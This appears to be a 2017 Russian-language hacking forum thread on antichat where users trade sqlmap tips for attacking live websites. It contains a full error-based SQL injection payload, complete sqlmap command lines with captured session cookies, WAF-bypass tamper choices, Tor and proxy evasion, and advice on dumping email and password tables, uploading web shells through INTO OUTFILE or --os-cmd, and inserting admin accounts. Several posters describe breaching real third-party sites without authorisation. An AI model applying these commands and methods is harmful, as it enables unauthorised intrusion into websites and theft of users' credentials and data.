↑ (https://antichat.live/posts/4088851/)
попробуй --no-cast и количество потоков по меньше если стоит --threads 10


перепробовал все вышеописанные советы. Выдает - [ERROR] unable to retrieve the number of entries for any table

Этот запрос я вытащил из дампера. Он успешно сливает, но очень медленно.

MrScrudg
25.05.2017, 15:35
RWD said:
↑ (https://antichat.live/posts/4088851/)
попробуй --no-cast и количество потоков по меньше если стоит --threads 10


не помогает, также как и --hex

MrScrudg
25.05.2017, 15:36
MollizZz said:
↑ (https://antichat.live/posts/4088869/)
А как победить это:
Spoiler: Хрень какая то
http://i.imgur.com/DQiTM7r.png


Ошибки коннекта (бан сервером, его зависание), понижение потоков + повышение задержки (--delay) + можно попробовать --random-agent вместе с --hex

Octavian
26.05.2017, 21:49
Что за ошибка внизу

http://savepic.ru/14111501.jpg

Octavian
27.05.2017, 02:34
Скулмап сохраняет старые значение команды и невидет новые помогите

ACat
27.05.2017, 13:29
MrBa said:
↑ (https://antichat.live/posts/4088613/)
Есть уязвимость в виде -
http://www.=======.com/index.php?re...ma./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1 (http://www.=======.com/index.php?ref=shavez'+and(%2f**%2fsElEcT+1+%2f**%2 ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f* *%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fc OnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x217e 21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt+6 78,1))+%2f**%2ffRoM+information_schema.%2f**%2ftAb LeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2f fRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRo Up%2f**%2fbY+x)a)+and+'1'='1)
как это можно вставить в sqlmap?


--tamper юзать

ACat
27.05.2017, 13:30
Octavian said:
↑ (https://antichat.live/posts/4089895/)
Скулмап сохраняет старые значение команды и невидет новые помогите


удалить из папки .sqlmap дамп со старыми значениями в рчную

если работаешь в --sql-shell - поменять логику

ACat
27.05.2017, 13:30
MrBa said:
↑ (https://antichat.live/posts/4088962/)
перепробовал все вышеописанные советы. Выдает - [ERROR] unable to retrieve the number of entries for any table
Этот запрос я вытащил из дампера. Он успешно сливает, но очень медленно.


руками покрути, может ваф?

Octavian
27.05.2017, 13:55
ACat said:
↑ (https://antichat.live/posts/4089988/)
удалить из папки .sqlmap дамп со старыми значениями в рчную
если работаешь в --sql-shell - поменять логику


Я в скулмап удалил все и скачял заново и то же самое я запускаю из под винды

ACat
27.05.2017, 16:36
юзай burp suite для более тонкой работы с багами

MollizZz
30.05.2017, 12:09
ACat said:
↑ (https://antichat.live/posts/4089987/)
--tamper юзать


Знать бы еще какие конкретно использовать

ACat
30.05.2017, 14:01
MollizZz said:
↑ (https://antichat.live/posts/4091030/)
Знать бы еще какие конкретно использовать


http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

MollizZz
30.05.2017, 14:15
ACat said:
↑ (https://antichat.live/posts/4091078/)
http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap


Это я понял. Суть их применения я знаю. Но как узнать какие и в какой ситуации применять? Или все по очереди пробовать?

t0ma5
30.05.2017, 14:30
MollizZz said:
↑ (https://antichat.live/posts/4091086/)
Это я понял. Суть их применения я знаю. Но как узнать какие и в какой ситуации применять? Или все по очереди пробовать?


человек - думает, софт - делает

руками отправляй запросы, определи какие символы/словосочетания блокируются, узнай как обойти/найди нужный тампер

larina1
31.05.2017, 08:55
Ковыряю sqlmap'ом сайты на joomla и некоторых других cms,

часто встречаю подобное:


Code:
[WARNING] unable to retrieve column names for table '#__users' in database

Пробовал ставить joomla на локалке, по дефолту генерятся префиксы для таблиц.

Откуда тогда берется префикс "#__" въехать немогу

Подскажите плиз, как это можно победить sqlmap'ом, или руками.

Не знаю в какую сторону даже копать/смотреть, что почитать об этом...

P.S. искал по форуму, ответа не смог найти.

Сори если уже было.

GreenGO
31.05.2017, 19:38
larina1 said:
↑ (https://antichat.live/posts/4091289/)
Ковыряю sqlmap'ом сайты на joomla и некоторых других cms,
часто встречаю подобное:

Code:
[WARNING] unable to retrieve column names for table '#__users' in database

Пробовал ставить joomla на локалке, по дефолту генерятся префиксы для таблиц.
Откуда тогда берется префикс "#__" въехать немогу
Подскажите плиз, как это можно победить sqlmap'ом, или руками.
Не знаю в какую сторону даже копать/смотреть, что почитать об этом...
P.S. искал по форуму, ответа не смог найти.
Сори если уже было.


Бывает в Joomla 3... Так и дампь #__users, только попробуй сразу -T #__users -C id,username,password и тп. Или пробовал?

madam
01.06.2017, 21:26
Ещё маленький вопрос по sqlmap как ему указать параметр вот такого типа /index/uid/(sql).html

joelblack
01.06.2017, 22:02
madam said:
↑ (https://antichat.live/posts/4091939/)
Ещё маленький вопрос по sqlmap как ему указать параметр вот такого типа /index/uid/(sql).html


https://github.com/sqlmapproject/sqlmap/wiki/Usage#arbitrary-injection-point

BabaDook
01.06.2017, 22:36
madam said:
↑ (https://antichat.live/posts/4091939/)
Ещё маленький вопрос по sqlmap как ему указать параметр вот такого типа /index/uid/(sql).html


чё? Мб не так понял. Но может быть site.fr/index/page/str*.html

Xsite
05.06.2017, 22:34
Ребят кто может обьсянить вид иньекции stacked queries и почему говорят ,что при ней легче всего "залится"

august_rush
06.06.2017, 03:03
Всем привет. Есть некий сайт у которого есть подобного рода уязвимости:

Type: boolean-based blind

Type: error-based

Type: AND/OR time-based blind

Пользователь который заходит на сайт имеет права USAGE. То-есть нельзя просто так залить шелл. Нужно как-то попасть на сам сервер чтобы его туда подгрузить. На запросы с просьбой залить файл или шелл выдает ошибку мол у тебя прав нет.

Попался на столько продуманные и современный сайт что в тот же самый бокс можно влить еще XSS.

Вопрос, как залить шелл?

З.ы. Если нужны какие-то конкретные запросы пишите, скину

h3xp1017
06.06.2017, 11:12
august_rush said:
↑ (https://antichat.live/posts/4093592/)
Вопрос, как залить шелл?
З.ы. Если нужны какие-то конкретные запросы пишите, скину


вытащи логин админа, найди админку, залей шелл.

ACat
06.06.2017, 11:16
Xsite said:
↑ (https://antichat.live/posts/4093530/)
Ребят кто может обьсянить вид иньекции stacked queries и почему говорят ,что при ней легче всего "залится"


это когда можно кроме юнион селект делать запросы любых типов. ты спокойно можешь инсертнуть админа или файл, если файл прив позволяет

Protocoler
11.06.2017, 04:04
Хелп.

1) Возвращает BD в двух символах, в непонятной кодировке.

2)

SQLMap запрашивает переход на https , если продолжить с шифрованием, то

вылезают ошибки "error ssl.c 490 sslv3 alert handshake" а так же "ssl VERSION erorr", что дал гугл :

https://github.com/requests/requests/issues/2022

https://github.com/requests/requests/issues/625

При заходе через браузер, все ок.

если продолжить без ssl шифрования, то все ок. Как быть когда без шифрования нельзя ?

h3xp1017
11.06.2017, 19:20
Protocoler said:
↑ (https://antichat.live/posts/4095311/)
Хелп


очевидно что у тебя какие-то проблемы, возможно антивирь серты подменяет (нод такое любит).



Как быть когда без шифрования нельзя ?

или можешь наоборот попробовать в таком случае через sslstrip на свой серт подменять, может сработать.

LeninDie
14.06.2017, 23:37
может кто нибудь подсказать как восстановить сессию из файла session.sqlite. пробовал так: sqlmap.py -s "/путь/до/этого/файла/session.sqlite" и нихрена. Выдает:

Usage: sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic

or -hh for advanced help

реально ли восстановить сессию? запарился уже пересканивать (скуля слепая) и какой набор параметров при сканировании был уже не помню.

ACat
15.06.2017, 10:44
по-моему склмап считывает файловую архитектуру в своей директории .sqlmap

у меня это /root/.sqlmap/output/site.com

в папке /root/.sqlmap/output/dump должны быть файлы соответствующие имена баз данных

а в /root/.sqlmap/output/site.com сам файл session.sqlite

зы могу ошибаться, т.к. никогда не было подобных проблемм. попробуйте обновить склмап из репозитория на гитхабе

LeninDie
15.06.2017, 14:42
ACat said:
↑ (https://antichat.live/posts/4096473/)
по-моему склмап считывает файловую архитектуру в своей директории .sqlmap
у меня это /root/.sqlmap/output/site.com
в папке /root/.sqlmap/output/dump должны быть файлы соответствующие имена баз данных
а в /root/.sqlmap/output/site.com сам файл session.sqlite
зы могу ошибаться, т.к. никогда не было подобных проблемм. попробуйте обновить склмап из репозитория на гитхабе


я и в винде пробывал прописывать адрес до этой папки и в кали тоже. и везде одно и то же. нид хелп!!!

Vald
17.06.2017, 23:49
Подскажите, что делает параметр --no-cast? По мануалу не могу понять.

MollizZz
19.06.2017, 17:03
Буду признателен, если кто то нормально объяснить как правильно подбирать тамперы. Или ссылку на понятный мануал по этой теме

ACat
20.06.2017, 01:41
выше читай

Bypassing Web Application Firewalls with SQLMap Tamper Scripts (http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap)

вообще можно загуглить.

danil911
26.06.2017, 21:18
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).

Что посоветуете ?

ACat
29.06.2017, 11:20
danil911 said:
↑ (https://antichat.live/posts/4100085/)
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).
Что посоветуете ?


char encode

v3n0m1
01.07.2017, 09:47
Поставить sqlmap, скорость упала, как сохранить данные которые уже скачались из базы? Если просто окно закрыть, вроде как данные все пропадут...

r00t_hack
01.07.2017, 13:07
as my self SQLmap better than havij.

=HALK=
10.07.2017, 19:39
Vald said:
↑ (https://antichat.live/posts/4097255/)
Подскажите, что делает параметр --no-cast? По мануалу не могу понять.


Type cast - приведение типов.

sqlmapпо умолчанию использует приведение типов данных к строковым значениям для удобного отображения результата в консоли.

Но не всегда этот механизм необходим, в некоторых случаях данные не будут корректно приведены к строковому типу.

Для наглядности работы механизма можно рассмотреть запросы к MySQL, которые генерирует sqlmap:

a) без параметра --no-cast


1' UNION SELECT CONCAT(0x3a,
IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)
,0x3a)


б) с параметром --no-cast


1' UNION SELECT CONCAT(0x3a,
CURRENT_USER()
,0x3a)

SadBlackFox
11.07.2017, 10:05
Не получается раскрутить уязвимость(это же уязвимость?)

Ошибка: https://s8.hostingkartinok.com/uploads/images/2017/07/80ef9de7524d6b4140aa13115e042fec.png

POST такой:

.SpoilerTarget" type="button">Spoiler
Заголовки:


Code:
Host: site.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: site.ru/page
Cookie: __cfduid=d6db872199804f625c490305153453b1b14997337 04; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Тело:


Code:
Content-Type: multipart/form-data; boundary=---------------------------29948882417335
Content-Length: 249

-----------------------------29948882417335
Content-Disposition: form-data; name="email"

'
-----------------------------29948882417335
Content-Disposition: form-data; name="password"

00000000
-----------------------------29948882417335--


Пытаюсь вот так, я наверное неправильно --data оформляю


Code:
sqlmap.py -u "site.ru/page" --proxy-file="proxy.txt" --random-agent --time-sec=10 --delay=1 --tamper="between,randomcase,space2comment" --dbms=mysql --level=5 --risk=1 -v3 --data="???"

t0ma5
11.07.2017, 13:46
SadBlackFox said:
↑ (https://antichat.live/posts/4104651/)
Не получается раскрутить уязвимость(это же уязвимость?)


-u "site.ru/page" --proxy-file="proxy.txt" --random-agent --tamper="between,randomcase,space2comment" --cookie="__cfduid=d6db872199804f625c490305153453b1b14997337 04; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423" -v 3 --data "password=123&email=123" -p email --dbs

SadBlackFox
12.07.2017, 23:38
Ковыряю я ковыряю, и не могу никак выковырять...

Пишет такое: https://goo.gl/xBLfpu

https://goo.gl/xBLfpu

Lazy
31.07.2017, 00:20
Нашел сейчас при помощи sqlmap дыры на паре форумов в Германии и Польше . Один вроде даже довольно крупный .

На первом форуме успеваю слить список бд . Потом сервер отключается . Ошибка 502 bad gateway с любого ip .

На втором time-based blind . Полчаса и тот же резалт .

Собственно wtf ? Никогда с таким не сталкивался ранее . Это типа новая защита или sqlmap в 8 потоков роняет теперь маршрутизаторы ?

\/IRUS
31.07.2017, 06:35
time-based да еще и слепой может быть обычным лагом из-за твоего пинга

а первый может WAF спалил, пробуй разные техники обхода WAF, заHEXи инъекцию как вариант

но если WAF уже сработал то высока вероятность что об этом админ тоже узнал и дырки уже нет

tantuno
31.07.2017, 12:45
Привет. Подскажите плиз как в python скрипт интегрировать sqlmap? Через pip sqlmap установил, а что дальше делать непонятно. Не могу понять как задать какие-либо параметры.

P.S. Как работать напрямую с sqlmap я знаю. Мне нужно его именно добавить в скрипт

RWD
31.07.2017, 23:32
Lazy said:
↑ (https://antichat.live/posts/4111658/)
8 потоков


8 потоков роняют криво настроенные сервера и бд....

brown
03.08.2017, 16:22
Подскажите как указать свой префикс при бруте таблиц

erwerr2321
03.08.2017, 16:26
brown said:
↑ (https://antichat.live/posts/4113154/)
Подскажите как указать свой префикс при бруте таблиц


21 страница пост чуть выше или чуть ниже твоего...

brown
03.08.2017, 16:31
ms13 said:
↑ (https://antichat.live/posts/4113158/)
21 страница пост чуть выше или чуть ниже твоего...


то есть если я укажу --prefix="adm_" --get-tables будет брутить таблицы такого вида adm_user?

t0ma5
03.08.2017, 16:36
brown said:
↑ (https://antichat.live/posts/4113166/)
то есть если я укажу --prefix="adm_" --get-tables будет брутить таблицы такого вида adm_user?


хз, не проверял, таблицы для брута если правильно понимаю тут sqlmap/txt/common-tables.txt

можешь так сделать


Code:
~/sqlmap/txt$ mv common-tables.txt common-tables.txt-old
~/sqlmap/txt$ cat common-tables.txt-old | grep -vE '^#' | perl -lane 'if($_=~s/(.*)/YOUPREF_$1/){print $_}' > common-tables.txt

erwerr2321
03.08.2017, 16:36
brown said:
↑ (https://antichat.live/posts/4113166/)
то есть если я укажу --prefix="adm_" --get-tables будет брутить таблицы такого вида adm_user?


нет, конечно, это тут

/usr/share/sqlmap/txt/common-tables.txt

brown
06.08.2017, 12:09
[12:01:59] [INFO] URI parameter '#1*' appears to be 'PostgreSQL > 8.1 AND time-b

ased blind' injectable

for the remaining tests, do you want to include all tests for 'PostgreSQL' exten

ding provided level (3) value? [Y/n] y

[12:02:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[12:02:05] [INFO] automatically extending ranges for UNION query injection techn

ique tests as there is at least one other (potential) technique found

[12:02:38] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns

'

[12:02:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce

the time needed to find the right number of query columns. Automatically extendi

ng the range for current UNION query injection technique test

[12:02:47] [INFO] target URL appears to have 4 columns in query

[12:03:12] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'

[12:03:50] [INFO] testing 'Generic UNION query (random number) - 21 to 40 column

s'

[12:04:20] [INFO] target URL appears to be UNION injectable with 40 columns

[12:05:27] [CRITICAL] unable to connect to the target URL ('╧юя√Єър єёЄрэютшЄ№ ё

юхфшэхэшх с√ыр схчєёях°эющ, Є.ъ. юЄ фЁєуюую ъюья№■ЄхЁр чр ЄЁхсєхьюх тЁхь эх яюы

єўхэ эєцэ√щ юЄъышъ, шыш с√ыю ЁрчюЁтрэю єцх єёЄрэютыхээюх ёюхфшэхэшх шч-'). sqlma

p is going to retry the request(s)

[12:05:27] [WARNING] if the problem persists please try to lower the number of u

sed threads (option '--threads')

[12:08:49] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'

[12:09:28] [INFO] checking if the injection point on URI parameter '#1*' is a fa

lse positive

Такое впечатление что не докручивает,подскажите как еще можно попробовать реализовать атаку?Скуля вида ?id=123

Hedorda
08.08.2017, 17:32
А как добавить страницу на сайт с помощью SQL injection? Видел как хакеры hentaic0de team добавили страницу anon.php. На том сайте была скюля вида ?id=222.

BabaDook
08.08.2017, 17:41
Hedorda said:
↑ (https://antichat.live/posts/4114872/)
А как добавить страницу на сайт с помощью SQL injection? Видел как хакеры hentaic0de team добавили страницу anon.php. На том сайте была скюля вида ?id=222.


Покажи о чём ты ?

panic.ker
08.08.2017, 17:44
Hedorda said:
↑ (https://antichat.live/posts/4114872/)
А как добавить страницу на сайт с помощью SQL injection? Видел как хакеры hentaic0de team добавили страницу anon.php. На том сайте была скюля вида ?id=222.


Шелл залили? Это не скуля такого вида, это уязвимый параметр

BabaDook
08.08.2017, 17:47
http://bamboo.ispicio.com/about.action про эт наверное идёт речь

Hedorda
08.08.2017, 17:48
panic.ker said:
↑ (https://antichat.live/posts/4114877/)
Шелл залили? Это не скуля такого вида, это уязвимый параметр


Не совсем. Там root прав нет. Права только на чтение.

Hedorda
08.08.2017, 17:49
BabaDook said:
↑ (https://antichat.live/posts/4114879/)
http://bamboo.ispicio.com/about.action
про эт наверное идёт речь


Да! Только это сделал другой: anon99husein

brown
20.08.2017, 16:42
[14:42:53] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 41 times

ASP.NET RequestValidationMode

какой темпер юзать?

panic.ker
22.08.2017, 09:13
Четверг, с помидорами творог.

Какой зонт брать?

z0mbie86
24.08.2017, 16:34
Извините если не в том разделе,

возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)

Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.

На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)

Направьте на путь истинный, подскажите методы решения.

Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL

rudu2
24.08.2017, 21:34
Вопрос.Есть скуля как через sqlmap изменить к примеру в таблице user где стоит первый admin изменить на имя к примеру test.

roman921
27.08.2017, 01:24
Исследую сайтик с уязвимостью, но юзер базы не dba, а как поднять права, чтобы можно было загрузить шел, слить файлы с сервака ? Нужно os-shell или метасплойт сессию открывать и прописывать права юзеру базы через консоль винды ( сервер на вин2003 компе).

roman921
27.08.2017, 16:25
Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?

cat1vo
28.08.2017, 13:29
roman921 said:
↑ (https://antichat.live/posts/4121664/)
Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?


--fresh-queries

dR0ny
28.08.2017, 18:45
Доброго денечка всем.

Кручу один сайтец уже хз сколько времени, это пздц какой-то. В общем Бурп нашел такой алярм :

.SpoilerTarget" type="button">Spoiler
POST /signin.html HTTP/1.1

Host: site

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Referer: http://site.com/signin.html

Content-Type: application/x-www-form-urlencoded

Content-Length: 77

Cookie: LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18

referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord=

Правильно ли я прописываюсь в sqlmap?

.SpoilerTarget" type="button">Spoiler
-u "http://site.com/signin.html" -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10 --cookie="LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18" --data "referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord="

Ребят как раскрутить? Также срабатывает WAF...

roman921
29.08.2017, 14:35
cat1vo said:
↑ (https://antichat.live/posts/4121928/)
--fresh-queries


С этой опцией он начинает обновлять все записи. Как конкретную запись заставить его проверить на ошибки ?

dR0ny
29.08.2017, 21:52
Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс

Скрин

http://s014.radikal.ru/i329/1708/cb/b0a3da599e4d.jpg

Что пишу в Мапе:

.SpoilerTarget" type="button">Spoiler
-u "http://www.site:80/news/news.html?date=2016-09" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10

brown
07.09.2017, 22:01
dR0ny said:
↑ (https://antichat.live/posts/4122393/)
Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс
Скрин
http://s014.radikal.ru/i329/1708/cb/b0a3da599e4d.jpg
Что пишу в Мапе:
Spoiler
-u "
http://www.site:80/news/news.html?date=2016-09
" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10


Скорей всего блокируется Select хз меня такая же проблема была,не нашел какой темпер юзать,если кто поможет буду благодарен

MrBa
08.09.2017, 14:02
Пытаюсь залить шелл. ls-dbs:true

Вот запрос - sqlmap -u "http://xxxxxx.com/product/shopview.php?shop=51479 (http://hiderefer.me/?http://xxxxxx.com/product/shopview.php?shop=51479)" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1

путь есть, указываю -

please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main

но он обращается сюда и подставляет из запроса product/shopview.php/ -

[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'

как избавиться от этого? Ведь указываю путь куда именно залить файл

t0ma5
08.09.2017, 14:34
MrBa said:
↑ (https://antichat.live/posts/4125663/)
Пытаюсь залить шелл. ls-dbs:true
Вот запрос - sqlmap -u "
http://xxxxxx.com/product/shopview.php?shop=51479 (http://hiderefer.me/?http://xxxxxx.com/product/shopview.php?shop=51479)
" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1
путь есть, указываю -
please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main
но он обращается сюда и подставляет из запроса product/shopview.php/ -
[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'
как избавиться от этого? Ведь указываю путь куда именно залить файл




Code:
--file-write=WFILE Write a local file on the back-end DBMS file system --- локальный путь до файла
--file-dest=DFILE Back-end DBMS absolute filepath to write to --- куда лить на удаленном хосте

а вообще чего руками то не залить

MrBa
08.09.2017, 15:03
BabaDook said:
↑ (https://antichat.live/posts/4125671/)
Ведь указываю путь куда именно залить файл - Точно ?


точно


BabaDook said:
↑ (https://antichat.live/posts/4125671/)
--dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1 Вообще с такой командой мог бы и не спрашивать я . Изучай мануал


Спасибо за развернутый ответ. Изучал мануал. Вы наверное родились с этими знаниями. Горжусь вами. Просто задал вопрос